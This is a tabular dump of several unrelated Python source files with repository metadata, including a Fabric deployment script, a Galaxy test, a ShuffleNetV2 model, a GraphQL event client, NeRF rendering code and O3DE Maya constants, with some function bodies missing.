hexsha stringlengths 40 40 | size int64 5 2.06M | ext stringclasses 11 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 3 251 | max_stars_repo_name stringlengths 4 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 251 | max_issues_repo_name stringlengths 4 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 251 | max_forks_repo_name stringlengths 4 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.05M | avg_line_length float64 1 1.02M | max_line_length int64 3 1.04M | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
c03228b2ca7a1e5710fd3d833f2457053dd2e585 | 834 | py | Python | 2015/solutions/day1.py | rsizem2/aoc_2020 | aa2dbf72a4c44930755bd9cc132ad7854f742f09 | [
"MIT"
] | null | null | null | 2015/solutions/day1.py | rsizem2/aoc_2020 | aa2dbf72a4c44930755bd9cc132ad7854f742f09 | [
"MIT"
] | null | null | null | 2015/solutions/day1.py | rsizem2/aoc_2020 | aa2dbf72a4c44930755bd9cc132ad7854f742f09 | [
"MIT"
] | null | null | null |
puzzle1()
puzzle2() | 20.85 | 46 | 0.464029 |
c032d43f5d12902206b5df36fccb87158ca21d3e | 466 | py | Python | setup.py | Kamuish/StarSearch | 63e5f6ee544ab1d48ae5b0d8e9067cedccc40d1e | [
"MIT"
] | null | null | null | setup.py | Kamuish/StarSearch | 63e5f6ee544ab1d48ae5b0d8e9067cedccc40d1e | [
"MIT"
] | null | null | null | setup.py | Kamuish/StarSearch | 63e5f6ee544ab1d48ae5b0d8e9067cedccc40d1e | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from setuptools import setup
setup(name='starsearch',
version='0.3',
description='Package to dig into the ESO archives',
author='Joo Camacho',
author_email='joao.camacho@astro.up.pt',
license='MIT',
url='https://github.com/jdavidrcamacho/starsearch',
packages=['starsearch'],
install_requires=[
'numpy',
'astroquery',
"astropy",
],
)
| 24.526316 | 57 | 0.592275 |
c033f2c7fd8a3e95e76135943dd54b89791b98ca | 4,192 | py | Python | test/integration/test_genomes.py | beatrizserrano/galaxy | e149d9d32e1bca6c07c38b1a9cdabfee60323610 | [
"CC-BY-3.0"
] | null | null | null | test/integration/test_genomes.py | beatrizserrano/galaxy | e149d9d32e1bca6c07c38b1a9cdabfee60323610 | [
"CC-BY-3.0"
] | 6 | 2021-11-11T20:57:49.000Z | 2021-12-10T15:30:33.000Z | test/integration/test_genomes.py | beatrizserrano/galaxy | e149d9d32e1bca6c07c38b1a9cdabfee60323610 | [
"CC-BY-3.0"
] | null | null | null | import os
import tempfile
from unittest.mock import patch
from galaxy.exceptions import (
ObjectNotFound,
ReferenceDataError,
)
from galaxy_test.driver import integration_util
BUILDS_DATA = (
"?\tunspecified (?)",
"hg_test\tdescription of hg_test",
"hg_test_nolen\tdescription of hg_test_nolen",
)
LEN_DATA = (
"chr1\t248956422",
"chr2\t242193529",
"chr3\t198295559",
)
| 37.765766 | 105 | 0.659351 |
c034484825d157d2b2d547cd6cfeff947673d5f5 | 2,310 | py | Python | examples/exersice2DimRed.py | s2812135/Data_Challenges_WiSe2122 | a55372f444e7344af4e2e1f04e4244fb8cefeefe | [
"MIT"
] | null | null | null | examples/exersice2DimRed.py | s2812135/Data_Challenges_WiSe2122 | a55372f444e7344af4e2e1f04e4244fb8cefeefe | [
"MIT"
] | null | null | null | examples/exersice2DimRed.py | s2812135/Data_Challenges_WiSe2122 | a55372f444e7344af4e2e1f04e4244fb8cefeefe | [
"MIT"
] | null | null | null | import numpy as np
import pandas as pd
import os
from tqdm import tqdm
import pacmap
import matplotlib.pyplot as plt
from sklearn.manifold import TSNE
import umap
| 29.615385 | 98 | 0.587446 |
c0347d378ceb67aeed162b5a86aeec563c7f0a79 | 5,757 | py | Python | release.py | jhofmann/yubiauth | 724feb45b54db196af406edf87f2bfcc2e849842 | [
"BSD-2-Clause"
] | 17 | 2015-01-06T16:28:55.000Z | 2021-11-21T15:26:01.000Z | release.py | DalavanCloud/yubiauth | 42292de043f8e106384796ff233be0b2dc930f60 | [
"BSD-2-Clause"
] | 4 | 2015-09-11T14:00:14.000Z | 2017-05-25T15:00:17.000Z | release.py | DalavanCloud/yubiauth | 42292de043f8e106384796ff233be0b2dc930f60 | [
"BSD-2-Clause"
] | 9 | 2015-03-11T22:37:47.000Z | 2022-03-01T21:17:35.000Z | # Copyright (c) 2013 Yubico AB
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or
# without modification, are permitted provided that the following
# conditions are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from distutils import log
from distutils.core import Command
from distutils.errors import DistutilsSetupError
import os
import re
from datetime import date
| 38.125828 | 78 | 0.605176 |
c034cf5f5c4b3712b5f752c6874beaede0ef7f49 | 10,949 | py | Python | fabfile.py | 8081594571/bgtools_web | f99389788f6e8db0d1b7781f41af819efd7e9dc2 | [
"MIT"
] | 1 | 2020-10-01T15:56:12.000Z | 2020-10-01T15:56:12.000Z | fabfile.py | Arvindvishwakarma/bgtools_web | 82b03c49e00a6ffcc563289c68bcf2a7a6985633 | [
"MIT"
] | null | null | null | fabfile.py | Arvindvishwakarma/bgtools_web | 82b03c49e00a6ffcc563289c68bcf2a7a6985633 | [
"MIT"
] | 1 | 2020-10-01T06:53:41.000Z | 2020-10-01T06:53:41.000Z |
# Credit goes to https://bitbucket.org/spookylukey/django-fabfile-starter/src
import os
import datetime as dt
from io import StringIO
import json
import posixpath
import fabric
import requests
from fabsettings import (USER, HOST, DJANGO_APP_NAME,
DJANGO_APPS_DIR, LOGS_ROOT_DIR,
APP_PORT, GUNICORN_WORKERS, DJANGO_PROJECT_NAME,
STAGING_APP_PORT)
def upload_template(c, filename, destination, context=None, template_dir=None):
"""
Render and upload a template text file to a remote host.
"""
text = None
template_dir = template_dir or os.getcwd()
from jinja2 import Environment, FileSystemLoader
jenv = Environment(loader=FileSystemLoader(template_dir))
context = context if context is not None else {}
text = jenv.get_template(filename).render(**context)
# Force to a byte representation of Unicode, or str()ification
# within Paramiko's SFTP machinery may cause decode issues for
# truly non-ASCII characters.
# text = text.encode('utf-8')
# Upload the file.
return c.put(
StringIO(text),
destination,
)
def venv(c):
"""
Runs a command in a virtualenv (which has been specified using
the virtualenv context manager
"""
return c.prefix("source {}/bin/activate".format(c.config.bgtools.VENV_DIR))
def rsync_source(c):
"""
rsync the source over to the server
"""
args = c.config.bgtools
rsync(c, os.path.join(args.LOCAL_DIR, 'bgtools'), args.DJANGO_APP_ROOT)
def collect_static(c):
"""
Collect django static content on server
"""
with venv(c), c.cd(c.config.bgtools.SRC_DIR):
c.run('python manage.py collectstatic --no-input')
| 38.017361 | 115 | 0.574664 |
c034fca0ee726969b9b040225228ff287755ee94 | 5,273 | py | Python | Deep Thumbnail Face Classification and Verification/models/ShuffleNetV2.py | roycechan/portfolio | 5e6a916031d2a3c60d2757483fc4765941d6f1f0 | [
"MIT"
] | 1 | 2022-03-14T04:59:54.000Z | 2022-03-14T04:59:54.000Z | Deep Thumbnail Face Classification and Verification/models/ShuffleNetV2.py | roycechan/portfolio | 5e6a916031d2a3c60d2757483fc4765941d6f1f0 | [
"MIT"
] | null | null | null | Deep Thumbnail Face Classification and Verification/models/ShuffleNetV2.py | roycechan/portfolio | 5e6a916031d2a3c60d2757483fc4765941d6f1f0 | [
"MIT"
] | null | null | null | import torch
from torch import nn
from torch.autograd import Variable
import config
def test():
net = ShuffleNetV2(2300, 2)
x = Variable(torch.randn(3, 3, 32, 32))
y = net(x)
print("end", y.size())
if __name__ == '__main__':
test()
| 36.365517 | 120 | 0.616537 |
c036324f468e909b938249cc16b70ee9b1588b7d | 6,264 | py | Python | warhorn_api.py | jagerkin/warbot | d30851a454b9eef45d5d4d095ae63e846229153d | [
"Apache-2.0"
] | 1 | 2021-12-23T05:09:01.000Z | 2021-12-23T05:09:01.000Z | warhorn_api.py | jagerkin/warbot | d30851a454b9eef45d5d4d095ae63e846229153d | [
"Apache-2.0"
] | 1 | 2021-12-23T05:00:24.000Z | 2021-12-23T05:00:24.000Z | warhorn_api.py | jagerkin/warbot | d30851a454b9eef45d5d4d095ae63e846229153d | [
"Apache-2.0"
] | null | null | null | # Copyright 2021 Michael Olson
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Warhorn GraphQL client."""
import collections.abc
import datetime
import logging
from typing import AsyncGenerator, Dict, Optional, Sequence, Tuple, Union
import pytz
from gql import gql, Client
from gql.transport.aiohttp import AIOHTTPTransport
from gql.transport.aiohttp import log as gql_logger
_QUERY = '''\
{{
eventSessions(
events: ["{slug}"],
startsAfter: "{startsAfter}") {{
nodes {{
status
scenario {{
name
}}
scenarioOffering {{
customName
}}
signupUrl
uuid
slot {{
timezone
startsAt
endsAt
}}
}}
}}
}}'''
_GQLNode = Optional[Union[str, Dict[str, '_GQLNode'], Sequence['_GQLNode']]]
def _strings_exists(*strings: str) -> bool:
"""Check that all of the strings exist and none of them are just the str 'None'."""
for s in strings:
if s in ('', 'None'):
return False
return True
| 32.968421 | 98 | 0.608397 |
c036c5b85abcd0ef620f9e8bbff718b557b0b6ee | 13,750 | py | Python | regnerf/internal/models.py | gunpowder78/google-research | d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5 | [
"Apache-2.0"
] | 1 | 2022-03-13T21:48:52.000Z | 2022-03-13T21:48:52.000Z | regnerf/internal/models.py | gunpowder78/google-research | d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5 | [
"Apache-2.0"
] | null | null | null | regnerf/internal/models.py | gunpowder78/google-research | d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5 | [
"Apache-2.0"
] | 1 | 2022-03-30T07:20:29.000Z | 2022-03-30T07:20:29.000Z | # coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Different model implementation plus a general port for all the models."""
import functools
from typing import Any, Callable
from flax import linen as nn
import gin
from internal import mip, utils # pylint: disable=g-multiple-import
import jax
from jax import random
import jax.numpy as jnp
def construct_mipnerf(rng, rays, config):
"""Construct a Neural Radiance Field.
Args:
rng: jnp.ndarray. Random number generator.
rays: an example of input Rays.
config: A Config class.
Returns:
model: nn.Model. Nerf model with parameters.
state: flax.Module.state. Nerf model state for stateful parameters.
"""
# Grab just 10 rays, to minimize memory overhead during construction.
ray = jax.tree_map(lambda x: jnp.reshape(x, [-1, x.shape[-1]])[:10], rays)
model = MipNerfModel(config=config)
init_variables = model.init(
rng, rng=None, rays=ray, resample_padding=0., compute_extras=False)
return model, init_variables
def cosine_easing_window(alpha, min_freq_log2=0, max_freq_log2=16):
"""Eases in each frequency one by one with a cosine.
This is equivalent to taking a Tukey window and sliding it to the right
along the frequency spectrum.
Args:
alpha: will ease in each frequency as alpha goes from 0.0 to num_freqs.
min_freq_log2: the lower frequency band.
max_freq_log2: the upper frequency band.
Returns:
A 1-d numpy array with num_sample elements containing the window.
"""
num_bands = max_freq_log2 - min_freq_log2
bands = jnp.linspace(min_freq_log2, max_freq_log2, num_bands)
x = jnp.clip(alpha - bands, 0.0, 1.0)
values = 0.5 * (1 + jnp.cos(jnp.pi * x + jnp.pi))
# always set first 4 freqs to 1
values = values.reshape(-1)
values = jnp.concatenate([jnp.ones_like(values[:4]), values[4:]])
values = jnp.repeat(values.reshape(-1, 1), 3, axis=1).reshape(-1)
return jnp.stack([values, values])
def render_image(render_fn, rays, rng, config):
"""Render all the pixels of an image (in test mode).
Args:
render_fn: function, jit-ed render function.
rays: a `Rays` pytree, the rays to be rendered.
rng: jnp.ndarray, random number generator (used in training mode only).
config: A Config class.
Returns:
rgb: jnp.ndarray, rendered color image.
disp: jnp.ndarray, rendered disparity image.
acc: jnp.ndarray, rendered accumulated weights per pixel.
"""
height, width = rays.origins.shape[:2]
num_rays = height * width
rays = jax.tree_map(lambda r: r.reshape((num_rays, -1)), rays)
host_id = jax.host_id()
chunks = []
idx0s = range(0, num_rays, config.render_chunk_size)
for i_chunk, idx0 in enumerate(idx0s):
# pylint: disable=cell-var-from-loop
if i_chunk % max(1, len(idx0s) // 10) == 0:
print(f'Rendering chunk {i_chunk}/{len(idx0s)-1}')
chunk_rays = (
jax.tree_map(lambda r: r[idx0:idx0 + config.render_chunk_size], rays))
actual_chunk_size = chunk_rays.origins.shape[0]
rays_remaining = actual_chunk_size % jax.device_count()
if rays_remaining != 0:
padding = jax.device_count() - rays_remaining
chunk_rays = jax.tree_map(
lambda r: jnp.pad(r, ((0, padding), (0, 0)), mode='edge'), chunk_rays)
else:
padding = 0
# After padding the number of chunk_rays is always divisible by host_count.
rays_per_host = chunk_rays.origins.shape[0] // jax.host_count()
start, stop = host_id * rays_per_host, (host_id + 1) * rays_per_host
chunk_rays = jax.tree_map(lambda r: utils.shard(r[start:stop]), chunk_rays)
chunk_renderings = render_fn(rng, chunk_rays)
# Unshard the renderings
chunk_renderings = [{k: utils.unshard(v[0], padding)
for k, v in r.items()}
for r in chunk_renderings]
chunk_rendering = chunk_renderings[-1]
keys = [k for k in chunk_renderings[0] if k.find('ray_') == 0]
for k in keys:
chunk_rendering[k] = [r[k] for r in chunk_renderings]
chunks.append(chunk_rendering)
rendering = {}
for k in chunks[0]:
if isinstance(chunks[0][k], list):
rendering[k] = [r[k] for r in chunks]
ds = range(len(rendering[k][0]))
rendering[k] = [jnp.concatenate([r[d] for r in rendering[k]]) for d in ds]
else:
rendering[k] = jnp.concatenate([r[k] for r in chunks])
rendering[k] = (
rendering[k].reshape((height, width) + chunks[0][k].shape[1:]))
# After all of the ray bundles have been concatenated together, extract a
# new random bundle (deterministically) from the concatenation that is the
# same size as one of the individual bundles.
keys = [k for k in rendering if k.find('ray_') == 0]
if keys:
ray_idx = random.permutation(
random.PRNGKey(0), rendering[keys[0]][0].shape[0])[:config.vis_num_rays]
for k in keys:
rendering[k] = [r[ray_idx] for r in rendering[k]]
return rendering
| 38.300836 | 84 | 0.663273 |
c03730c3fe56f310fa37ff5662b46d4ef0a1326f | 13,948 | py | Python | Gems/AtomLyIntegration/TechnicalArt/DccScriptingInterface/Tools/DCC/Maya/constants.py | prophetl33t/o3de | eaeeb883eee1594b1b93327f6909eebd1a826caf | [
"Apache-2.0",
"MIT"
] | null | null | null | Gems/AtomLyIntegration/TechnicalArt/DccScriptingInterface/Tools/DCC/Maya/constants.py | prophetl33t/o3de | eaeeb883eee1594b1b93327f6909eebd1a826caf | [
"Apache-2.0",
"MIT"
] | null | null | null | Gems/AtomLyIntegration/TechnicalArt/DccScriptingInterface/Tools/DCC/Maya/constants.py | prophetl33t/o3de | eaeeb883eee1594b1b93327f6909eebd1a826caf | [
"Apache-2.0",
"MIT"
] | null | null | null | # coding:utf-8
#!/usr/bin/python
#
# Copyright (c) Contributors to the Open 3D Engine Project.
# For complete copyright and license terms please see the LICENSE at the root of this distribution.
#
# SPDX-License-Identifier: Apache-2.0 OR MIT
#
#
# -------------------------------------------------------------------------
"""! @brief
Module Documentation:
< DCCsi >:: Tools/DCC/Maya/constants.py
This module contains default values for commony used constants & strings.
We can make an update here easily that is propogated elsewhere.
"""
# -------------------------------------------------------------------------
# built-ins
import sys
import os
import site
import timeit
import inspect
from os.path import expanduser
from pathlib import Path
import logging as _logging
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
_START = timeit.default_timer() # start tracking
# global scope
_MODULENAME = 'Tools.DCC.Maya.constants'
_LOGGER = _logging.getLogger(_MODULENAME)
_LOGGER.debug('Initializing: {}.'.format({_MODULENAME}))
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
# Maya is frozen
# module path when frozen
_MODULE_PATH = Path(os.path.abspath(inspect.getfile(inspect.currentframe())))
_LOGGER.debug('_MODULE_PATH: {}'.format(_MODULE_PATH))
_PATH_DCCSI_TOOLS_MAYA = Path(_MODULE_PATH.parent)
_PATH_DCCSI_TOOLS_MAYA = Path(os.getenv('PATH_DCCSI_TOOLS_MAYA',
_PATH_DCCSI_TOOLS_MAYA.as_posix()))
_PATH_DCCSI_TOOLS_DCC = Path(_PATH_DCCSI_TOOLS_MAYA.parent)
_PATH_DCCSI_TOOLS_DCC = Path(os.getenv('PATH_DCCSI_TOOLS_DCC',
_PATH_DCCSI_TOOLS_DCC.as_posix()))
_PATH_DCCSI_TOOLS = Path(_PATH_DCCSI_TOOLS_DCC.parent)
_PATH_DCCSI_TOOLS = Path(os.getenv('PATH_DCCSI_TOOLS',
_PATH_DCCSI_TOOLS.as_posix()))
# we need to set up basic access to the DCCsi
_PATH_DCCSIG = Path(_PATH_DCCSI_TOOLS.parent)
_PATH_DCCSIG = Path(os.getenv('PATH_DCCSIG', _PATH_DCCSIG.as_posix()))
site.addsitedir(_PATH_DCCSIG.as_posix())
_LOGGER.debug('_PATH_DCCSIG: {}'.format(_PATH_DCCSIG.as_posix()))
# this is the shared default requirements.txt file to install for python 3.6.x+
DCCSI_PYTHON_REQUIREMENTS = Path(_PATH_DCCSIG, 'requirements.txt').as_posix()
# if using maya 2020 or less with py2.7 override with and use the one here:
# "DccScriptingInterface\Tools\DCC\Maya\requirements.txt"
# now we have azpy api access
from azpy.env_bool import env_bool
from azpy.constants import ENVAR_DCCSI_GDEBUG
from azpy.constants import ENVAR_DCCSI_DEV_MODE
from azpy.constants import ENVAR_DCCSI_LOGLEVEL
from azpy.constants import ENVAR_DCCSI_GDEBUGGER
from azpy.constants import FRMT_LOG_LONG
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
from azpy.constants import * # but here are the specific ones we are gonna use
from azpy.constants import PATH_PROGRAMFILES_X64
from azpy.constants import TAG_PY_MAJOR
from azpy.constants import TAG_PY_MINOR
from azpy.constants import PATH_USER_HOME
from azpy.constants import PATH_USER_O3DE
from azpy.constants import ENVAR_O3DE_DEV
from azpy.constants import PATH_O3DE_DEV
from azpy.constants import ENVAR_PATH_DCCSIG
from azpy.constants import PATH_DCCSIG
from azpy.constants import ENVAR_DCCSI_LOG_PATH
from azpy.constants import PATH_DCCSI_LOG_PATH
from azpy.constants import ENVAR_DCCSI_PY_VERSION_MAJOR
from azpy.constants import ENVAR_DCCSI_PY_VERSION_MINOR
from azpy.constants import ENVAR_PATH_DCCSI_PYTHON_LIB
from azpy.constants import STR_PATH_DCCSI_PYTHON_LIB
from azpy.constants import PATH_DCCSI_PYTHON_LIB
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
# dcc: Maya ENVAR constants
ENVAR_DCCSI_PY_VERSION_MAJOR=str("DCCSI_PY_VERSION_MAJOR")
ENVAR_DCCSI_PY_VERSION_MINOR=str("DCCSI_PY_VERSION_MINOR")
ENVAR_DCCSI_PY_VERSION_RELEASE=str("DCCSI_PY_VERSION_RELEASE")
ENVAR_MAYA_NO_CONSOLE_WINDOW = str("MAYA_NO_CONSOLE_WINDOW")
ENVAR_MAYA_SHOW_OUTPUT_WINDOW = str("MAYA_SHOW_OUTPUT_WINDOW")
TAG_O3DE_DCC_MAYA_MEL = 'dccsi_setup.mel'
TAG_MAYA_WORKSPACE = 'workspace.mel'
ENVAR_DCCSI_PY_MAYA = str('DCCSI_PY_MAYA')
ENVAR_MAYA_VERSION = str('MAYA_VERSION')
ENVAR_MAYA_LOCATION = str('MAYA_LOCATION')
ENVAR_PATH_DCCSI_TOOLS_MAYA = str('PATH_DCCSI_TOOLS_MAYA')
ENVAR_MAYA_MODULE_PATH = str('MAYA_MODULE_PATH')
ENVAR_MAYA_BIN_PATH = str('MAYA_BIN_PATH')
ENVAR_DCCSI_MAYA_PLUG_IN_PATH = str('DCCSI_MAYA_PLUG_IN_PATH')
ENVAR_MAYA_PLUG_IN_PATH = str('MAYA_PLUG_IN_PATH')
ENVAR_DCCSI_MAYA_SHELF_PATH = str('DCCSI_MAYA_SHELF_PATH')
ENVAR_MAYA_SHELF_PATH = str('MAYA_SHELF_PATH')
ENVAR_DCCSI_MAYA_XBMLANGPATH = str('DCCSI_MAYA_XBMLANGPATH')
ENVAR_XBMLANGPATH = str('XBMLANGPATH')
ENVAR_DCCSI_MAYA_SCRIPT_MEL_PATH = str('DCCSI_MAYA_SCRIPT_MEL_PATH')
ENVAR_DCCSI_MAYA_SCRIPT_PY_PATH = str('DCCSI_MAYA_SCRIPT_PY_PATH')
ENVAR_DCCSI_MAYA_SCRIPT_PATH = str("DCCSI_MAYA_SCRIPT_PATH")
ENVAR_MAYA_SCRIPT_PATH = str('MAYA_SCRIPT_PATH')
ENVAR_DCCSI_MAYA_SET_CALLBACKS = str('DCCSI_MAYA_SET_CALLBACKS')
ENVAR_MAYA_VP2_DEVICE_OVERRIDE=str("MAYA_VP2_DEVICE_OVERRIDE")
ENVAR_MAYA_OGS_DEVICE_OVERRIDE=str("MAYA_OGS_DEVICE_OVERRIDE")
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
# Maya consts
#USER_HOME = Path.home()
# mimicing all values from: "DccScriptingInterface\Tools\Dev\Windows\Env_DCC_Maya.bat"
# note: these are just default values, they are only initially CONST
# if/when imported from here (constants.py)
DCCSI_PY_VERSION_MAJOR = 3
DCCSI_PY_VERSION_MINOR = 7
DCCSI_PY_VERSION_RELEASE = 7
# override with maya defaults
PATH_DCCSI_PYTHON_LIB = STR_PATH_DCCSI_PYTHON_LIB.format(_PATH_DCCSIG,
DCCSI_PY_VERSION_MAJOR,
DCCSI_PY_VERSION_MINOR)
# not actually a maya envar, to do: could rename DCCSI_MAYA_VERSION
MAYA_VERSION=2022
# is a maya envar
MAYA_PROJECT = _PATH_DCCSIG.as_posix()
PATH_DCCSI_TOOLS_MAYA = _PATH_DCCSI_TOOLS_MAYA.as_posix()
# is a maya envar
MAYA_MODULE_PATH = _PATH_DCCSI_TOOLS_MAYA.as_posix()
# is a maya envar
MAYA_LOCATION = Path(PATH_PROGRAMFILES_X64,'Autodesk', 'Maya{}'.format(MAYA_VERSION)).as_posix()
# is a maya envar
MAYA_BIN_PATH = Path(MAYA_LOCATION, 'bin').as_posix()
DCCSI_MAYA_SET_CALLBACKS = True
# is a maya envar
MAYA_NO_CONSOLE_WINDOW = False
MAYA_SHOW_OUTPUT_WINDOW = True
DCCSI_MAYA_EXE = Path(MAYA_BIN_PATH, 'maya.exe')
DCCSI_MAYABATCH_EXE = Path(MAYA_BIN_PATH, 'mayabatch.exe')
DCCSI_PY_MAYA = Path(MAYA_BIN_PATH, 'mayapy.exe')
# this is transient and will always track the exe this script is executing on
O3DE_PY_EXE = Path(sys.executable).as_posix()
DCCSI_PY_IDE = Path(DCCSI_PY_MAYA).as_posix()
DCCSI_MAYA_PLUG_IN_PATH = Path(PATH_DCCSI_TOOLS_MAYA,'plugins').as_posix()
# is a maya envar
MAYA_PLUG_IN_PATH = Path(DCCSI_MAYA_PLUG_IN_PATH).as_posix() # extend %MAYA_PLUG_IN_PATH%
# to do: remove or extend next PR, technically there can be more then one plugin path
#while MAYA_PLUG_IN_PATH:
#if ENVAR_MAYA_PLUG_IN_PATH in os.environ:
#maya_plug_pathlist = os.getenv(ENVAR_MAYA_PLUG_IN_PATH).split(os.pathsep)
#maya_plug_new_pathlist = maya_plug_pathlist.copy()
#maya_plug_new_pathlist.insert(0, Path(DCCSI_MAYA_PLUG_IN_PATH).as_posix())
#os.environ[ENVAR_MAYA_PLUG_IN_PATH] = os.pathsep.join(maya_plug_new_pathlist)
#else:
#os.environ[ENVAR_MAYA_PLUG_IN_PATH] = DCCSI_MAYA_PLUG_IN_PATH
#MAYA_PLUG_IN_PATH = os.getenv(ENVAR_MAYA_PLUG_IN_PATH, "< NOT SET >")
#break
DCCSI_MAYA_SHELF_PATH = Path(PATH_DCCSI_TOOLS_MAYA, 'Prefs', 'Shelves').as_posix()
DCCSI_MAYA_XBMLANGPATH = Path(PATH_DCCSI_TOOLS_MAYA, 'Prefs', 'icons').as_posix()
# is a maya envar
# maya resources, very oddly named
XBMLANGPATH = Path(DCCSI_MAYA_XBMLANGPATH).as_posix() # extend %XBMLANGPATH%
# to do: remove or extend next PR, technically there can be more then one resource path specified
#while XBMLANGPATH:
#if ENVAR_XBMLANGPATH in os.environ:
#maya_xbm_pathlist = os.getenv(ENVAR_XBMLANGPATH).split(os.pathsep)
#maya_xbm_new_pathlist = maya_xbm_pathlist.copy()
#maya_xbm_new_pathlist.insert(0, Path(DCCSI_MAYA_XBMLANGPATH).as_posix())
#os.environ[ENVAR_XBMLANGPATH] = os.pathsep.join(maya_xbm_new_pathlist)
#else:
#os.environ[ENVAR_XBMLANGPATH] = DCCSI_MAYA_XBMLANGPATH
#XBMLANGPATH = os.getenv(ENVAR_XBMLANGPATH, "< NOT SET >")
#break
DCCSI_MAYA_SCRIPT_PATH = Path(PATH_DCCSI_TOOLS_MAYA, 'Scripts').as_posix()
DCCSI_MAYA_SCRIPT_MEL_PATH = Path(PATH_DCCSI_TOOLS_MAYA, 'Scripts', 'Mel').as_posix()
DCCSI_MAYA_SCRIPT_PY_PATH = Path(PATH_DCCSI_TOOLS_MAYA, 'Scripts', 'Python').as_posix()
MAYA_SCRIPT_PATH = Path(DCCSI_MAYA_SCRIPT_PATH).as_posix() # extend %MAYA_SCRIPT_PATH%
# to do: remove or extend next PR, technically there can be more then one script path specified
#while MAYA_SCRIPT_PATH:
#if ENVAR_MAYA_SCRIPT_PATH in os.environ:
#maya_script_pathlist = os.getenv(ENVAR_MAYA_SCRIPT_PATH).split(os.pathsep)
#maya_script_new_pathlist = maya_script_pathlist.copy()
#maya_script_new_pathlist.insert(0, DCCSI_MAYA_SCRIPT_MEL_PATH)
#maya_script_new_pathlist.insert(0, DCCSI_MAYA_SCRIPT_PY_PATH)
#maya_script_new_pathlist.insert(0, DCCSI_MAYA_SCRIPT_PATH)
#os.environ[ENVAR_MAYA_SCRIPT_PATH] = os.pathsep.join(maya_script_new_pathlist)
#else:
#os.environ[ENVAR_MAYA_SCRIPT_PATH] = os.pathsep.join( (DCCSI_MAYA_SCRIPT_PATH,
#DCCSI_MAYA_SCRIPT_PY_PATH,
#DCCSI_MAYA_SCRIPT_MEL_PATH) )
#MAYA_SCRIPT_PATH = os.getenv(ENVAR_MAYA_SCRIPT_PATH, "< NOT SET >")
#break
# is a maya envar
MAYA_VP2_DEVICE_OVERRIDE="VirtualDeviceDx11"
MAYA_OGS_DEVICE_OVERRIDE="VirtualDeviceDx11"
DCCSI_MAYA_WIKI_URL = 'https://github.com/o3de/o3de/wiki/O3DE-DCCsi-Tools-DCC-Maya'
# reference, here is a list of Maya envars
# https://github.com/mottosso/Maya-Environment-Variables/blob/master/README.md
# -------------------------------------------------------------------------
###########################################################################
# Main Code Block, runs this script as main (testing)
# -------------------------------------------------------------------------
if __name__ == '__main__':
"""Run this file as a standalone script"""
# happy print
_LOGGER.info(STR_CROSSBAR)
_LOGGER.info('~ {}.py ... Running script as __main__'.format(_MODULENAME))
_LOGGER.info(STR_CROSSBAR)
# global debug stuff
_DCCSI_GDEBUG = env_bool(ENVAR_DCCSI_GDEBUG, True)
